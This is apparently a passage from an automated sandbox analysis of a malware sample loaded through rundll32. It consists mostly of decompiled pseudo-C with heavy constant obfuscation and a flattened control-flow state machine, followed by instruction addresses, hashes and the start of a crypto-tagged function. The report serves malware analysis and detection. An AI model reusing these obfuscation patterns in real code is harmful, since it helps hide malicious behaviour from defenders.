				_v260 = _v260 >> 0xc;
				_v260 = _v260 ^ 0x0001adb7;
				_v204 = 0x2b40b;
				_t879 = 0x72;
				_v204 = _v204 / _t879;
				_t778 = 0xf;
				_v204 = _v204 / _t778;
				_t779 = 0x79;
				_v204 = _v204 * 0x1e;
				_v204 = _v204 ^ 0x000520e0;
				_v84 = 0xeaa539;
				_v84 = _v84 + 0xffff8f42;
				_v84 = _v84 ^ 0x00e48483;
				_v124 = 0xa185d5;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 3;
				_v124 = _v124 ^ 0x143f3fdc;
				_v92 = 0xa97737;
				_v92 = _v92 ^ 0xeb9ba296;
				_v92 = _v92 ^ 0xeb365c56;
				_v132 = 0xbd678a;
				_v132 = _v132 + 0x8717;
				_v132 = _v132 | 0xacb35e9c;
				_v132 = _v132 ^ 0xacb35ba6;
				_v68 = 0x976f37;
				_v68 = _v68 + 0xffff737a;
				_v68 = _v68 ^ 0x00925dc3;
				_v200 = 0x3716ae;
				_v200 = _v200 * 0x3d;
				_v200 = _v200 + 0x7c18;
				_v200 = _v200 / _t779;
				_v200 = _v200 ^ 0x00164f5a;
				_v116 = 0x90307;
				_v116 = _v116 + 0xffff7314;
				_t780 = 0x73;
				_v116 = _v116 / _t780;
				_v116 = _v116 ^ 0x000cd282;
				_v76 = 0x344fd1;
				_v76 = _v76 | 0x7db0f0e8;
				_v76 = _v76 ^ 0x7db1d9db;
				_v216 = 0x1a88b7;
				_v216 = _v216 + 0xffff5c3b;
				_v216 = _v216 + 0xffff2820;
				_t876 = 9;
				_v216 = _v216 / _t876;
				_v216 = _v216 ^ 0x000cec9e;
				_v100 = 0x3ced92;
				_v100 = _v100 + 0xffff1312;
				_v100 = _v100 + 0xffffd55c;
				_v100 = _v100 ^ 0x00361c3b;
				_v184 = 0x789494;
				_v184 = _v184 + 0xffff0c7f;
				_v184 = _v184 << 1;
				_v184 = _v184 | 0x402d3e8e;
				_v184 = _v184 ^ 0x40e21003;
				_v192 = 0x310378;
				_v192 = _v192 << 0xb;
				_t781 = 0x22;
				_v192 = _v192 * 3;
				_v192 = _v192 + 0xffff6836;
				_v192 = _v192 ^ 0x985d636a;
				_v244 = 0xaa43bf;
				_v244 = _v244 / _t879;
				_v244 = _v244 << 0xf;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0xb200e8c6;
				_v188 = 0xd75c86;
				_v188 = _v188 << 9;
				_v188 = _v188 | 0x025244f6;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0xd553b68a;
				_v144 = 0x6e01bd;
				_v144 = _v144 ^ 0x0f7c0b9c;
				_v144 = _v144 / _t781;
				_v144 = _v144 ^ 0x007182e2;
				_v156 = 0xaeb978;
				_t782 = 0x1e;
				_v156 = _v156 / _t782;
				_v156 = _v156 + 0xffff8ee7;
				_v156 = _v156 ^ 0x000c354b;
				_v232 = 0x8c6aee;
				_v232 = _v232 ^ 0x1b23a9db;
				_v232 = _v232 + 0x8ee1;
				_v232 = _v232 + 0x44;
				_v232 = _v232 ^ 0x1bb20ffb;
				_v240 = 0xc4628c;
				_v240 = _v240 >> 0xd;
				_t783 = 0x6e;
				_v240 = _v240 / _t783;
				_v240 = _v240 + 0x5eea;
				_v240 = _v240 ^ 0x000cb0fe;
				_v64 = 0xd4a535;
				_v64 = _v64 ^ 0x78f16673;
				_v64 = _v64 ^ 0x7824c526;
				_v256 = 0x55d7a8;
				_v256 = _v256 ^ 0x05430866;
				_v256 = _v256 | 0xfffce0d7;
				_v256 = _v256 ^ 0xfff12a33;
				_v164 = 0xd10b34;
				_v164 = _v164 + 0xffffcbea;
				_v164 = _v164 + 0xffff01f2;
				_v164 = _v164 ^ 0x00ca8dd0;
				_v264 = 0x73bd71;
				_v264 = _v264 << 0xe;
				_v264 = _v264 >> 7;
				_v264 = _v264 << 0xa;
				_v264 = _v264 ^ 0x7ae6d472;
				_v172 = 0xd09f93;
				_v172 = _v172 + 0xffffeac5;
				_v172 = _v172 << 5;
				_v172 = _v172 ^ 0x1a1189dc;
				_v272 = 0xce1f77;
				_t784 = 0x5f;
				_v272 = _v272 / _t784;
				_t785 = 0x47;
				_v272 = _v272 * 0xd;
				_v272 = _v272 << 5;
				_v272 = _v272 ^ 0x0388d6fc;
				_v72 = 0xd0da8a;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x068dcd32;
				_v280 = 0xa513be;
				_v280 = _v280 + 0xffffcd90;
				_v280 = _v280 / _t785;
				_v280 = _v280 + 0xffffce89;
				_v280 = _v280 ^ 0x00081bd8;
				_v112 = 0xe9df;
				_t786 = 0x11;
				_v112 = _v112 * 0xd;
				_v112 = _v112 ^ 0xaf5ec247;
				_v112 = _v112 ^ 0xaf5aa6d7;
				_v180 = 0xdb028a;
				_v180 = _v180 * 0x1d;
				_v180 = _v180 >> 6;
				_v180 = _v180 ^ 0x0069b9f3;
				_v220 = 0xee6b4b;
				_v220 = _v220 << 3;
				_v220 = _v220 | 0xdc702aa0;
				_v220 = _v220 + 0x71ee;
				_v220 = _v220 ^ 0xdf76f250;
				_v296 = 0x23c05a;
				_v296 = _v296 * 0x5f;
				_v296 = _v296 * 0x36;
				_v296 = _v296 + 0xca24;
				_v296 = _v296 ^ 0xcc673138;
				_v176 = 0x22be9e;
				_v176 = _v176 * 0x5d;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 ^ 0x000fc27c;
				_v120 = 0x3d033e;
				_v120 = _v120 | 0x1fa14a75;
				_v120 = _v120 / _t786;
				_v120 = _v120 ^ 0x01d2865b;
				_v212 = 0xed5cb5;
				_t787 = 0x53;
				_v212 = _v212 / _t787;
				_v212 = _v212 ^ 0x510fb6d8;
				_v212 = _v212 * 0x76;
				_v212 = _v212 ^ 0x5c26df9e;
				_v32 = 0x743d42;
				_v32 = _v32 * 0x19;
				_v32 = _v32 ^ 0x0b543fb1;
				_v140 = 0xd2e396;
				_v140 = _v140 + 0xbc2f;
				_v140 = _v140 | 0xffabdfb7;
				_v140 = _v140 ^ 0xfffefe2d;
				_v56 = 0xb6af07;
				_v56 = _v56 | 0x3c719b52;
				_v56 = _v56 ^ 0x3cf6fc1e;
				_v148 = 0x4e57f8;
				_v148 = _v148 / _t876;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x008180da;
				_t880 = 0x8b31915;
				_v44 = 0xa59d4d;
				_t877 = 0xef66089;
				_t788 = 0x2c;
				_v44 = _v44 / _t788;
				_v44 = _v44 ^ 0x000f19f4;
				_v60 = 0x2ad52f;
				_v60 = _v60 | 0x792352db;
				_v60 = _v60 ^ 0x7927d8fa;
				while(1) {
					L1:
					while(1) {
						L2:
						_t789 = 0x93fa1a;
						while(1) {
							L3:
							_t859 = 0x2c1be6e;
							do {
								L4:
								_t891 = _t765 - _t880;
								if(_t891 > 0) {
									__eflags = _t765 - 0x92c7fbc;
									if(__eflags == 0) {
										_t765 = 0x826e25d;
										goto L27;
									} else {
										__eflags = _t765 - 0xb519ee2;
										if(__eflags == 0) {
											_push(_v132);
											_t654 =  &_v92; // 0xeb365c56
											_push( *_t654);
											_push(0x341518);
											_t759 = E0035FBCF(_v68,  &_v12, _v20, _v200, _v116, _v76, E0034AB66(_v84, _v124, __eflags), _v208, _v216, _v84,  &_v8);
											_t885 = _t885 + 0x30;
											__eflags = _t759 - _v108;
											_t765 =  ==  ? 0x2c1be6e : _t877;
											E0034AE03(_v100, _v184, _v192, _t757);
											goto L25;
										} else {
											__eflags = _t765 - 0xcf70aca;
											if(_t765 == 0xcf70aca) {
												E003468DE(_v32, _v140, _v56, _v148, _v16);
												_t885 = _t885 + 0xc;
												_t765 = _t877;
												goto L1;
											} else {
												__eflags = _t765 - _t877;
												if(__eflags != 0) {
													goto L27;
												} else {
													E00347027(_v44, _v52, _v20, _v60);
												}
											}
										}
									}
								} else {
									if(_t891 == 0) {
										_t736 = E00353B45(_v224, _v156, _v232, _v240, _v64, _v248, _v12, _v256, _v16, _v20, _t789, _v164,  &_v24, _v264);
										_t885 = _t885 + 0x30;
										__eflags = _t736 - _v28;
										_t789 = 0x93fa1a;
										_t738 = 0x70434dd;
										_t765 =  ==  ? 0x93fa1a : 0xcf70aca;
										goto L3;
									} else {
										if(_t765 == _t789) {
											_t739 = E0034BA16(_a24, _v172, _v24, _v272, _v72, _v280, _a20, _v288);
											_t885 = _t885 + 0x18;
											__eflags = _t739 - _v40;
											_t738 = 0x70434dd;
											_t765 =  ==  ? 0x70434dd : 0x275f79a;
											goto L2;
										} else {
											if(_t765 == 0x275f79a) {
												E0034E723(_v296, _v176, _v24, _v120, _v212);
												_t885 = _t885 + 0xc;
												_t765 = 0xcf70aca;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t765 == _t859) {
													_push(_t789);
													_push(_t789);
													_t745 = E00353512(_v12);
													__eflags = _t745;
													_v16 = _t745;
													_t765 =  !=  ? _t880 : _t877;
													while(1) {
														L1:
														goto L2;
													}
												} else {
													if(_t765 == _t738) {
														_t746 = E0035FDA3(_v112, _a8, _v180, _v24, _v220, _v128, 0x20);
														_t885 = _t885 + 0x14;
														_t765 = 0x275f79a;
														__eflags = _t746 - _v252;
														_t883 =  ==  ? 1 : _t883;
														while(1) {
															L1:
															L2:
															_t789 = 0x93fa1a;
															L3:
															_t859 = 0x2c1be6e;
															goto L4;
														}
													} else {
														_t896 = _t765 - 0x826e25d;
														if(_t765 == 0x826e25d) {
															_push(_v96);
															_push(_v292);
															_push(0x341568);
															_t749 = E0034AB66(_v88, _v152, _t896);
															_push(_v136);
															_push(_v236);
															_push(0x341538);
															E00350EDA(E0034AB66(_v168, _v48, _t896), _v276, _v104, _t749,  &_v20, _v196, _v284);
															_t765 =  ==  ? 0xb519ee2 : 0x7228e80;
															E0034AE03(_v268, _v228, _v160, _t749);
															E0034AE03(_v36, _v260, _v204, _t750);
															_t885 = _t885 + 0x3c;
															_t877 = 0xef66089;
															L25:
															_t880 = 0x8b31915;
															_t738 = 0x70434dd;
															_t789 = 0x93fa1a;
															_t859 = 0x2c1be6e;
														}
														goto L27;
													}
												}
											}
										}
									}
								}
								L22:
								return _t883;
								L27:
							} while (_t765 != 0x7228e80);
							goto L22;
						}
					}
				}
			}

















































































































                                                                                                                      0x0035183b
                                                                                                                      0x00351842
                                                                                                                      0x00351849
                                                                                                                      0x0035184b
                                                                                                                      0x00351852
                                                                                                                      0x00351859
                                                                                                                      0x00351860
                                                                                                                      0x00351862
                                                                                                                      0x00351867
                                                                                                                      0x0035186f
                                                                                                                      0x00351879
                                                                                                                      0x0035187b
                                                                                                                      0x00351882
                                                                                                                      0x00351883
                                                                                                                      0x0035188e
                                                                                                                      0x0035189a
                                                                                                                      0x0035189e
                                                                                                                      0x003518a6
                                                                                                                      0x003518b1
                                                                                                                      0x003518bc
                                                                                                                      0x003518c7
                                                                                                                      0x003518cf
                                                                                                                      0x003518dc
                                                                                                                      0x003518df
                                                                                                                      0x003518e3
                                                                                                                      0x003518e8
                                                                                                                      0x003518f0
                                                                                                                      0x003518fb
                                                                                                                      0x00351906
                                                                                                                      0x00351911
                                                                                                                      0x0035191c
                                                                                                                      0x00351924
                                                                                                                      0x0035192c
                                                                                                                      0x00351934
                                                                                                                      0x0035193c
                                                                                                                      0x00351944
                                                                                                                      0x00351951
                                                                                                                      0x00351955
                                                                                                                      0x0035195a
                                                                                                                      0x00351962
                                                                                                                      0x0035196d
                                                                                                                      0x00351978
                                                                                                                      0x00351983
                                                                                                                      0x0035198b
                                                                                                                      0x00351993
                                                                                                                      0x0035199f
                                                                                                                      0x003519a2
                                                                                                                      0x003519a6
                                                                                                                      0x003519ae
                                                                                                                      0x003519c1
                                                                                                                      0x003519c8
                                                                                                                      0x003519d3
                                                                                                                      0x003519de
                                                                                                                      0x003519e9
                                                                                                                      0x003519f4
                                                                                                                      0x003519ff
                                                                                                                      0x00351a0c
                                                                                                                      0x00351a10
                                                                                                                      0x00351a15
                                                                                                                      0x00351a1d
                                                                                                                      0x00351a27
                                                                                                                      0x00351a32
                                                                                                                      0x00351a3d
                                                                                                                      0x00351a48
                                                                                                                      0x00351a53
                                                                                                                      0x00351a5e
                                                                                                                      0x00351a69
                                                                                                                      0x00351a74
                                                                                                                      0x00351a7c
                                                                                                                      0x00351a87
                                                                                                                      0x00351a92
                                                                                                                      0x00351a9a
                                                                                                                      0x00351aa2
                                                                                                                      0x00351aaa
                                                                                                                      0x00351aaf
                                                                                                                      0x00351ab7
                                                                                                                      0x00351ac2
                                                                                                                      0x00351acd
                                                                                                                      0x00351ad8
                                                                                                                      0x00351ae3
                                                                                                                      0x00351aee
                                                                                                                      0x00351af6
                                                                                                                      0x00351b01
                                                                                                                      0x00351b16
                                                                                                                      0x00351b19
                                                                                                                      0x00351b20
                                                                                                                      0x00351b2b
                                                                                                                      0x00351b3b
                                                                                                                      0x00351b3f
                                                                                                                      0x00351b47
                                                                                                                      0x00351b4f
                                                                                                                      0x00351b57
                                                                                                                      0x00351b62
                                                                                                                      0x00351b6d
                                                                                                                      0x00351b75
                                                                                                                      0x00351b80
                                                                                                                      0x00351b8b
                                                                                                                      0x00351b96
                                                                                                                      0x00351ba1
                                                                                                                      0x00351bac
                                                                                                                      0x00351bb8
                                                                                                                      0x00351bbd
                                                                                                                      0x00351bc3
                                                                                                                      0x00351bcb
                                                                                                                      0x00351bd0
                                                                                                                      0x00351bd8
                                                                                                                      0x00351be0
                                                                                                                      0x00351be5
                                                                                                                      0x00351bed
                                                                                                                      0x00351bf0
                                                                                                                      0x00351bf4
                                                                                                                      0x00351bfc
                                                                                                                      0x00351c04
                                                                                                                      0x00351c11
                                                                                                                      0x00351c15
                                                                                                                      0x00351c1d
                                                                                                                      0x00351c25
                                                                                                                      0x00351c2d
                                                                                                                      0x00351c32
                                                                                                                      0x00351c3a
                                                                                                                      0x00351c42
                                                                                                                      0x00351c4a
                                                                                                                      0x00351c5d
                                                                                                                      0x00351c64
                                                                                                                      0x00351c6c
                                                                                                                      0x00351c77
                                                                                                                      0x00351c84
                                                                                                                      0x00351c8f
                                                                                                                      0x00351c9a
                                                                                                                      0x00351ca2
                                                                                                                      0x00351caa
                                                                                                                      0x00351cb2
                                                                                                                      0x00351cb7
                                                                                                                      0x00351cbf
                                                                                                                      0x00351ccd
                                                                                                                      0x00351cd2
                                                                                                                      0x00351cdc
                                                                                                                      0x00351ce1
                                                                                                                      0x00351cec
                                                                                                                      0x00351cef
                                                                                                                      0x00351cf3
                                                                                                                      0x00351cfb
                                                                                                                      0x00351d06
                                                                                                                      0x00351d11
                                                                                                                      0x00351d1c
                                                                                                                      0x00351d27
                                                                                                                      0x00351d2f
                                                                                                                      0x00351d37
                                                                                                                      0x00351d42
                                                                                                                      0x00351d4d
                                                                                                                      0x00351d58
                                                                                                                      0x00351d63
                                                                                                                      0x00351d6e
                                                                                                                      0x00351d79
                                                                                                                      0x00351d84
                                                                                                                      0x00351d8f
                                                                                                                      0x00351d9a
                                                                                                                      0x00351da5
                                                                                                                      0x00351db0
                                                                                                                      0x00351dbd
                                                                                                                      0x00351dc1
                                                                                                                      0x00351dd1
                                                                                                                      0x00351dd5
                                                                                                                      0x00351ddd
                                                                                                                      0x00351de8
                                                                                                                      0x00351dfa
                                                                                                                      0x00351dff
                                                                                                                      0x00351e08
                                                                                                                      0x00351e13
                                                                                                                      0x00351e1e
                                                                                                                      0x00351e29
                                                                                                                      0x00351e34
                                                                                                                      0x00351e3c
                                                                                                                      0x00351e44
                                                                                                                      0x00351e50
                                                                                                                      0x00351e53
                                                                                                                      0x00351e57
                                                                                                                      0x00351e5f
                                                                                                                      0x00351e6a
                                                                                                                      0x00351e75
                                                                                                                      0x00351e80
                                                                                                                      0x00351e8b
                                                                                                                      0x00351e96
                                                                                                                      0x00351ea1
                                                                                                                      0x00351ea8
                                                                                                                      0x00351eb5
                                                                                                                      0x00351ec0
                                                                                                                      0x00351ec8
                                                                                                                      0x00351ed4
                                                                                                                      0x00351ed7
                                                                                                                      0x00351ede
                                                                                                                      0x00351ee9
                                                                                                                      0x00351ef4
                                                                                                                      0x00351f04
                                                                                                                      0x00351f08
                                                                                                                      0x00351f0d
                                                                                                                      0x00351f12
                                                                                                                      0x00351f1a
                                                                                                                      0x00351f25
                                                                                                                      0x00351f2d
                                                                                                                      0x00351f40
                                                                                                                      0x00351f47
                                                                                                                      0x00351f52
                                                                                                                      0x00351f5d
                                                                                                                      0x00351f73
                                                                                                                      0x00351f7a
                                                                                                                      0x00351f85
                                                                                                                      0x00351f97
                                                                                                                      0x00351f9c
                                                                                                                      0x00351fa5
                                                                                                                      0x00351fb0
                                                                                                                      0x00351fbb
                                                                                                                      0x00351fc3
                                                                                                                      0x00351fcb
                                                                                                                      0x00351fd3
                                                                                                                      0x00351fd8
                                                                                                                      0x00351fe0
                                                                                                                      0x00351fe8
                                                                                                                      0x00351ff1
                                                                                                                      0x00351ff6
                                                                                                                      0x00351ffc
                                                                                                                      0x00352004
                                                                                                                      0x0035200c
                                                                                                                      0x00352017
                                                                                                                      0x00352022
                                                                                                                      0x0035202d
                                                                                                                      0x00352035
                                                                                                                      0x0035203d
                                                                                                                      0x00352045
                                                                                                                      0x0035204d
                                                                                                                      0x00352058
                                                                                                                      0x00352063
                                                                                                                      0x0035206e
                                                                                                                      0x00352079
                                                                                                                      0x00352081
                                                                                                                      0x00352086
                                                                                                                      0x0035208b
                                                                                                                      0x00352090
                                                                                                                      0x00352098
                                                                                                                      0x003520a3
                                                                                                                      0x003520ae
                                                                                                                      0x003520b6
                                                                                                                      0x003520c1
                                                                                                                      0x003520cd
                                                                                                                      0x003520d0
                                                                                                                      0x003520dd
                                                                                                                      0x003520e0
                                                                                                                      0x003520e4
                                                                                                                      0x003520e9
                                                                                                                      0x003520f1
                                                                                                                      0x003520fc
                                                                                                                      0x00352104
                                                                                                                      0x0035210f
                                                                                                                      0x00352117
                                                                                                                      0x00352127
                                                                                                                      0x0035212b
                                                                                                                      0x00352133
                                                                                                                      0x0035213b
                                                                                                                      0x0035214e
                                                                                                                      0x00352151
                                                                                                                      0x00352158
                                                                                                                      0x00352163
                                                                                                                      0x0035216e
                                                                                                                      0x00352181
                                                                                                                      0x00352188
                                                                                                                      0x00352190
                                                                                                                      0x0035219b
                                                                                                                      0x003521a3
                                                                                                                      0x003521a8
                                                                                                                      0x003521b0
                                                                                                                      0x003521b8
                                                                                                                      0x003521c0
                                                                                                                      0x003521cd
                                                                                                                      0x003521d6
                                                                                                                      0x003521da
                                                                                                                      0x003521e2
                                                                                                                      0x003521ea
                                                                                                                      0x003521fd
                                                                                                                      0x00352204
                                                                                                                      0x0035220c
                                                                                                                      0x00352217
                                                                                                                      0x00352222
                                                                                                                      0x00352238
                                                                                                                      0x0035223f
                                                                                                                      0x0035224a
                                                                                                                      0x00352256
                                                                                                                      0x0035225b
                                                                                                                      0x0035225f
                                                                                                                      0x0035226c
                                                                                                                      0x00352270
                                                                                                                      0x00352278
                                                                                                                      0x0035228b
                                                                                                                      0x00352292
                                                                                                                      0x0035229d
                                                                                                                      0x003522a8
                                                                                                                      0x003522b3
                                                                                                                      0x003522be
                                                                                                                      0x003522c9
                                                                                                                      0x003522d4
                                                                                                                      0x003522df
                                                                                                                      0x003522ea
                                                                                                                      0x003522fe
                                                                                                                      0x00352305
                                                                                                                      0x0035230f
                                                                                                                      0x0035231a
                                                                                                                      0x0035231f
                                                                                                                      0x0035232a
                                                                                                                      0x00352338
                                                                                                                      0x0035233b
                                                                                                                      0x00352342
                                                                                                                      0x0035234d
                                                                                                                      0x00352358
                                                                                                                      0x00352363
                                                                                                                      0x0035236e
                                                                                                                      0x0035236e
                                                                                                                      0x00352373
                                                                                                                      0x00352373
                                                                                                                      0x00352373
                                                                                                                      0x00352378
                                                                                                                      0x00352378
                                                                                                                      0x00352378
                                                                                                                      0x0035237d
                                                                                                                      0x0035237d
                                                                                                                      0x0035237d
                                                                                                                      0x0035237f
                                                                                                                      0x003525fc
                                                                                                                      0x00352602
                                                                                                                      0x00352739
                                                                                                                      0x00000000
                                                                                                                      0x00352608
                                                                                                                      0x00352608
                                                                                                                      0x0035260e
                                                                                                                      0x00352682
                                                                                                                      0x00352689
                                                                                                                      0x00352689
                                                                                                                      0x0035269e
                                                                                                                      0x003526e9
                                                                                                                      0x003526ee
                                                                                                                      0x003526fc
                                                                                                                      0x00352712
                                                                                                                      0x0035271c
                                                                                                                      0x00000000
                                                                                                                      0x00352610
                                                                                                                      0x00352610
                                                                                                                      0x00352616
                                                                                                                      0x00352673
                                                                                                                      0x00352678
                                                                                                                      0x0035267b
                                                                                                                      0x00000000
                                                                                                                      0x00352618
                                                                                                                      0x00352618
                                                                                                                      0x0035261a
                                                                                                                      0x00000000
                                                                                                                      0x00352620
                                                                                                                      0x0035263c
                                                                                                                      0x00352642
                                                                                                                      0x0035261a
                                                                                                                      0x00352616
                                                                                                                      0x0035260e
                                                                                                                      0x00352385
                                                                                                                      0x00352385
                                                                                                                      0x003525d2
                                                                                                                      0x003525d9
                                                                                                                      0x003525e8
                                                                                                                      0x003525ea
                                                                                                                      0x003525ef
                                                                                                                      0x003525f4
                                                                                                                      0x00000000
                                                                                                                      0x0035238b
                                                                                                                      0x0035238d
                                                                                                                      0x0035255c
                                                                                                                      0x00352563
                                                                                                                      0x00352572
                                                                                                                      0x00352574
                                                                                                                      0x00352579
                                                                                                                      0x00000000
                                                                                                                      0x00352393
                                                                                                                      0x00352399
                                                                                                                      0x0035251b
                                                                                                                      0x00352520
                                                                                                                      0x00352523
                                                                                                                      0x0035236e
                                                                                                                      0x0035236e
                                                                                                                      0x00000000
                                                                                                                      0x0035236e
                                                                                                                      0x0035239f
                                                                                                                      0x003523a1
                                                                                                                      0x003524db
                                                                                                                      0x003524dc
                                                                                                                      0x003524e4
                                                                                                                      0x003524e9
                                                                                                                      0x003524eb
                                                                                                                      0x003524f6
                                                                                                                      0x0035236e
                                                                                                                      0x0035236e
                                                                                                                      0x00000000
                                                                                                                      0x0035236e
                                                                                                                      0x003523a7
                                                                                                                      0x003523a9
                                                                                                                      0x003524a9
                                                                                                                      0x003524b7
                                                                                                                      0x003524ba
                                                                                                                      0x003524bf
                                                                                                                      0x003524c1
                                                                                                                      0x0035236e
                                                                                                                      0x0035236e
                                                                                                                      0x00352373
                                                                                                                      0x00352373
                                                                                                                      0x00352378
                                                                                                                      0x00352378
                                                                                                                      0x00000000
                                                                                                                      0x00352378
                                                                                                                      0x003523af
                                                                                                                      0x003523af
                                                                                                                      0x003523b5
                                                                                                                      0x003523bb
                                                                                                                      0x003523c2
                                                                                                                      0x003523d4
                                                                                                                      0x003523d9
                                                                                                                      0x003523e3
                                                                                                                      0x003523ea
                                                                                                                      0x003523fc
                                                                                                                      0x00352429
                                                                                                                      0x00352452
                                                                                                                      0x00352459
                                                                                                                      0x0035246e
                                                                                                                      0x00352473
                                                                                                                      0x00352476
                                                                                                                      0x00352723
                                                                                                                      0x00352723
                                                                                                                      0x00352728
                                                                                                                      0x0035272d
                                                                                                                      0x00352732
                                                                                                                      0x00352732
                                                                                                                      0x00000000
                                                                                                                      0x003523b5
                                                                                                                      0x003523a9
                                                                                                                      0x003523a1
                                                                                                                      0x00352399
                                                                                                                      0x0035238d
                                                                                                                      0x00352385
                                                                                                                      0x00352645
                                                                                                                      0x0035264f
                                                                                                                      0x0035273e
                                                                                                                      0x0035273e
                                                                                                                      0x00000000
                                                                                                                      0x0035274a
                                                                                                                      0x00352378
                                                                                                                      0x00352373

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: 65f945308803f898ba8015a14f81b113aa519c5c28223350120097287859f536
                                                                                                                      • Instruction ID: 23db394d3d11c580005eac22c7d85888f6ed874a5b7da9142c7267082c71493d
                                                                                                                      • Opcode Fuzzy Hash: 65f945308803f898ba8015a14f81b113aa519c5c28223350120097287859f536
                                                                                                                      • Instruction Fuzzy Hash: 3872FF715083809FD379CF65C58AB8BBBE2BBC5304F10891DE6DA9A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00347B82 Relevance: 12.8, Strings: 10, Instructions: 339COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00347B82(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t404;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t430;
				void* _t463;
				void* _t464;
				signed int* _t468;

				_t468 =  &_v2776;
				_v2716 = 0x9827f0;
				_v2716 = _v2716 << 9;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x0304fe29;
				_v2684 = 0x251356;
				_v2684 = _v2684 + 0x1e2;
				_v2684 = _v2684 | 0xda75bfb2;
				_v2684 = _v2684 ^ 0xda7428eb;
				_v2768 = 0x24e368;
				_v2768 = _v2768 ^ 0xd5a17b15;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 | 0xced33043;
				_v2768 = _v2768 ^ 0xced6ff80;
				_v2736 = 0xa2f196;
				_v2736 = _v2736 + 0x6d02;
				_v2736 = _v2736 << 8;
				_v2736 = _v2736 * 0x63;
				_t463 = __ecx;
				_v2736 = _v2736 ^ 0x2d971c6c;
				_t464 = 0x422d362;
				_v2760 = 0x391c44;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xe88b;
				_v2760 = _v2760 + 0x506d;
				_v2760 = _v2760 ^ 0x00052d5d;
				_v2744 = 0x960a81;
				_t421 = 3;
				_v2744 = _v2744 * 0x47;
				_v2744 = _v2744 * 0x66;
				_v2744 = _v2744 + 0x35e4;
				_v2744 = _v2744 ^ 0x94845397;
				_v2604 = 0xe8b0f5;
				_v2604 = _v2604 + 0x9847;
				_v2604 = _v2604 ^ 0x00e1425b;
				_v2712 = 0x9aefe1;
				_v2712 = _v2712 + 0x2d7a;
				_v2712 = _v2712 | 0x79d44310;
				_v2712 = _v2712 ^ 0x79db8805;
				_v2728 = 0x1377c5;
				_v2728 = _v2728 | 0x6e97ff53;
				_v2728 = _v2728 + 0x22de;
				_v2728 = _v2728 ^ 0x6e9b6172;
				_v2752 = 0xb1335e;
				_v2752 = _v2752 ^ 0x2dbaf336;
				_v2752 = _v2752 / _t421;
				_v2752 = _v2752 ^ 0xfe92c193;
				_v2752 = _v2752 ^ 0xf19577cc;
				_v2660 = 0x2952e4;
				_v2660 = _v2660 | 0x79708fb3;
				_v2660 = _v2660 ^ 0x797ec65d;
				_v2680 = 0x48d1a6;
				_t422 = 0x34;
				_v2680 = _v2680 / _t422;
				_v2680 = _v2680 * 0x69;
				_v2680 = _v2680 ^ 0x0099bc36;
				_v2612 = 0xcdd72a;
				_v2612 = _v2612 * 0x50;
				_v2612 = _v2612 ^ 0x4054338c;
				_v2672 = 0x8e3222;
				_v2672 = _v2672 << 1;
				_v2672 = _v2672 ^ 0x0115b014;
				_v2772 = 0xea36ba;
				_v2772 = _v2772 + 0xffff2869;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0xcd7b9291;
				_v2772 = _v2772 ^ 0xcd4b3afc;
				_v2776 = 0x8f99fe;
				_v2776 = _v2776 + 0x5190;
				_v2776 = _v2776 + 0xffffc7d6;
				_v2776 = _v2776 ^ 0x0f761f96;
				_v2776 = _v2776 ^ 0x0ff50908;
				_v2652 = 0xb833cd;
				_t423 = 0x31;
				_v2652 = _v2652 * 0x75;
				_v2652 = _v2652 ^ 0x5422af3f;
				_v2620 = 0x8c6cc6;
				_v2620 = _v2620 + 0xffff9da6;
				_v2620 = _v2620 ^ 0x008df9f5;
				_v2688 = 0x40b504;
				_v2688 = _v2688 ^ 0xc3e337a5;
				_v2688 = _v2688 + 0x808c;
				_v2688 = _v2688 ^ 0xc3a77743;
				_v2704 = 0x4030d0;
				_v2704 = _v2704 | 0xd8d5f091;
				_v2704 = _v2704 ^ 0xb4a4ac2b;
				_v2704 = _v2704 ^ 0x6c7bdbfc;
				_v2644 = 0xafd4ef;
